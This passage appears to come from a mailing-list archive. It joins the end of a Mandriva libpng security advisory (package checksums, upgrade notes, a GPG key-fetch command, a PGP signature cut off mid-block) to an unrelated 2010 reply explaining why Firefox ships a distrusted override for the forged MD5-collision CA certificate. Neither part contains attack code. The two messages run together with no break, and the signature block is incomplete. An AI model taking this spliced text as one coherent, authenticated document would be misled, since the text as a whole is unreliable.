 8ea7ca8ab7bbed8f2683698a3f493d56  
corporate/4.0/i586/libpng3-static-devel-1.2.8-1.7.20060mlcs4.i586.rpm 
 76f958bdba2876ea2a36f42407aaa9dc  
corporate/4.0/SRPMS/libpng-1.2.8-1.7.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 a19c0839e78e5d16cc159621ff8e3786  
corporate/4.0/x86_64/lib64png3-1.2.8-1.7.20060mlcs4.x86_64.rpm
 68d1b5c5174f6de15eb1d68735e45e0f  
corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.7.20060mlcs4.x86_64.rpm
 d477b9271f6beba77435121f09dff09d  
corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.7.20060mlcs4.x86_64.rpm 
 76f958bdba2876ea2a36f42407aaa9dc  
corporate/4.0/SRPMS/libpng-1.2.8-1.7.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 5fe2f05d45ebaac79c58e47429dedceb  
mnf/2.0/i586/libpng3-1.2.5-10.12.M20mdk.i586.rpm
 0ebace3f9758ea06e6471317f95b253f  
mnf/2.0/i586/libpng3-devel-1.2.5-10.12.M20mdk.i586.rpm
 3aa8ba999455eb190979ec7f6f22421a  
mnf/2.0/i586/libpng3-static-devel-1.2.5-10.12.M20mdk.i586.rpm 
 1ceca3083b90247ac1d1b68b4bf08f33  
mnf/2.0/SRPMS/libpng-1.2.5-10.12.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLp88BmqjQ0CJFipgRAl2vAKCNCYs8gf3lw0tqgRMM

Re: Firefox 3.6 for Windows includes a forged CA cert

2010-03-23 Thread dveditz
> a cert labeled "MD5 Collisions Inc (http://www.phreedom.org/md5)" [...]
> Yes, it's expired, so it poses no real threat, but why is the Mozilla
> Project shipping Firefox with that cert?  It just causes FUD.

This is an override for the forged cert, with all trust bits removed. That
way should the demo cert make it into the wild users will get a hard
failure rather than an overridable one. We worried that many users are
trained to accept "expired" certs as fairly normal and not notice it was
an expired intermediate rather than the end cert.

For more information please see
https://bugzilla.mozilla.org/show_bug.cgi?id=471715

-Dan Veditz